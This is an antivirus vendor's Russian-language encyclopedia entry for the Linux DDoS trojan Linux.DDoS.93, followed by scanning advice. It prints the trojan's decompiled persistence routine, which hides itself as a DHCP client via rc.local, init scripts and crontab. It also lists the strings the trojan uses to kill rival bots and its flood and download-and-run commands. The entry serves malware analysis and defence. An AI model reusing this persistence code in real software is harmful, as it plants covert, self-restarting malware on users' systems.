Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.DDoS.93

Добавлен в вирусную базу Dr.Web: 2016-09-07

Описание добавлено:

SHA1:

  • f164721acd2e5dabaa2b802946162cbaac48aa5e (x64)
  • 76d7a2f1fcc3eeb398bba416ac5cc78072780367 (x64)
  • c3b5310eca6dce452c42e5db14a852d42b08f559 (armv6l)

Linux-троянец, предназначенный для осуществления DDoS-атак. Распространяется предположительно с использованием уязвимостей ShellShock.

При запуске проверяет наличие файла /var/run/dhcpclient-eth0.pid. Если тот не найден, пытается зарегистрировать себя в автозагрузке:

void __cdecl startup()
{
  char self_path[1023]; // [sp+0h] [bp-414h]@1
  int v1; // [sp+400h] [bp-14h]@1
  FILE *stream; // [sp+404h] [bp-10h]@3
  char v3[12]; // [sp+408h] [bp-Ch]@2
  v1 = readlink("/proc/self/exe", self_path, 0x3FFu);
  if ( v1 != -1 )
  {
    v3[v1 - 0x408] = 0;
    if ( geteuid() )
      goto LABEL_16;
    stream = fopen("/etc/rc.local", "w");
    if ( stream )
    {
      fprintf(stream, "#!/bin/sh -e\n%s\nexit 0", self_path);
      fclose(stream);
      return;
    }
    if ( !access("/etc/init.d", 0) )
    {
      rename(self_path, "/etc/init.d/dhcpclient-eth0");
      system("update-rc.d dhcpclient-eth0 defaults");
      return;
    }
    if ( !access("/etc/init", 0) )
    {
      stream = fopen("/etc/init/dhcpclient-eth0.conf", "w");
      if ( stream )
      {
        fprintf(stream, "description     \"dhcp client\"\nstart on startup\ntask\nexec %s", self_path);
        fclose(stream);
        return;
      }
    }
    stream = fopen("/etc/crontab", "a");
    if ( !stream )
    {
LABEL_16:
      system("crontab -l > tempcrontab");
      stream = fopen("tempcrontab", "a");
      if ( stream )
      {
        fprintf(stream, "\n@reboot %s\n", self_path);
        fclose(stream);
        system("crontab tempcrontab");
        remove("tempcrontab");
      }
    }
    else
    {
      fprintf(stream, "\n@reboot root %s\n", self_path);
      fclose(stream);
    }
  }
}

Затем файл /var/run/dhcpclient-eth0.pid блокируется на запись. Троянец маскирует собственное имя под имя "-sh". Затем с использованием /proc вредоносная программа исследует содержимое памяти и перечисляет исполняемые файлы процессов (с целью поиска других экземпляров троянца). Если среди них обнаруживается совпадение с одной из строк, приведенных в списке ниже, работа такого процесса останавливается:

                       signatures      dq offset aPrivmsg      ; DATA XREF: dump_memory+1A0r
.data:00000000006066C0                                         ; dump_file+ABr
.data:00000000006066C0                                         ; "privmsg"
.data:00000000006066C8                 dq offset aGetlocalip   ; "getlocalip"
.data:00000000006066D0                 dq offset aKaiten       ; "kaiten"
.data:00000000006066D8                 dq offset aBrianKrebs   ; "brian krebs"
.data:00000000006066E0                 dq offset aBotnet       ; "botnet"
.data:00000000006066E8                 dq offset aBitcoinMine  ; "bitcoin mine"
.data:00000000006066F0                 dq offset aLitecoinMine ; "litecoin mine"
.data:00000000006066F8                 dq offset aRootkit      ; "rootkit"
.data:0000000000606700                 dq offset aKeylogger    ; "keylogger"
.data:0000000000606708                 dq offset aDdosing      ; "ddosing"
.data:0000000000606710                 dq offset aNulling      ; "nulling"
.data:0000000000606718                 dq offset aHackforums   ; "hackforums"
.data:0000000000606720                 dq offset aSkiddie      ; "skiddie"
.data:0000000000606728                 dq offset aScriptKiddie ; "script kiddie"
.data:0000000000606730                 dq offset aBlackhat     ; "blackhat"
.data:0000000000606738                 dq offset aWhitehat     ; "whitehat"
.data:0000000000606740                 dq offset aGreyhat      ; "greyhat"
.data:0000000000606748                 dq offset aGrayhat      ; "grayhat"
.data:0000000000606750                 dq offset aDoxing       ; "doxing"
.data:0000000000606758                 dq offset aMalware      ; "malware"
.data:0000000000606760                 dq offset aBootkit      ; "bootkit"
.data:0000000000606768                 dq offset aRansomware   ; "ransomware"
.data:0000000000606770                 dq offset aSpyware      ; "spyware"
.data:0000000000606778                 dq offset aBotkiller    ; "botkiller"

Троянец генерирует собственный идентификатор следующего вида: [A-Z0-9]{20}.

Затем Linux.DDoS.93 создает два дочерних процесса. Первый обменивается информацией с управляющим сервером, а второй в непрерывном цикле проверяет, работает ли родительский процесс, и в случае остановки перезапускает его. В свою очередь родительский процесс тоже следит за дочерним и перезапускает его при необходимости — так троянец поддерживает свою непрерывную работу на зараженной машине.

Троянец способен обрабатывать следующие команды:

командапараметрыназначение
DNXhost URLскачать и запустить файл. Записывается в файл с именем getbinaries
GEThost port page timeначать атаку методом HTTP flood с использованием GET-запросов
HEADhost port page timeначать атаку методом HTTP flood с использованием HEAD-запросов
PING отправить команду “ping”
POSThost port page time postparamsначать атаку методом HTTP flood с использованием POST-запросов
RCDhost port timeначать атаку методом TCP flood (в пакеты записываются случайные данные длиной 4096 байт)
RUDPhost timeначать атаку методом UDP flood на случайный порт
SCANNERmethod port page params useragentотправить на 255 случайных IP-адресов HTTP-запросы с указанными параметрами
SUDPhost port timeначать атаку методом Spoofed UDP flood
TCPhost port timeначать атаку методом TCP flood
TERMINATE завершить выполнение
UDPhost port timeначать атаку методом UDP flood на указанный порт
UNINSTALL самоудалиться
UPDATEhost URLобновить вредоносную программу. Записывается в файл с именем getbinaries

Когда троянец получает команду начать DDoS-атаку или SCANNER, он сначала прекращает все дочерние процессы, а затем запускает 25 новых процессов, которые и выполняют атаку указанным злоумышленниками методом или осуществляют сканирование.

Новость о троянце

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру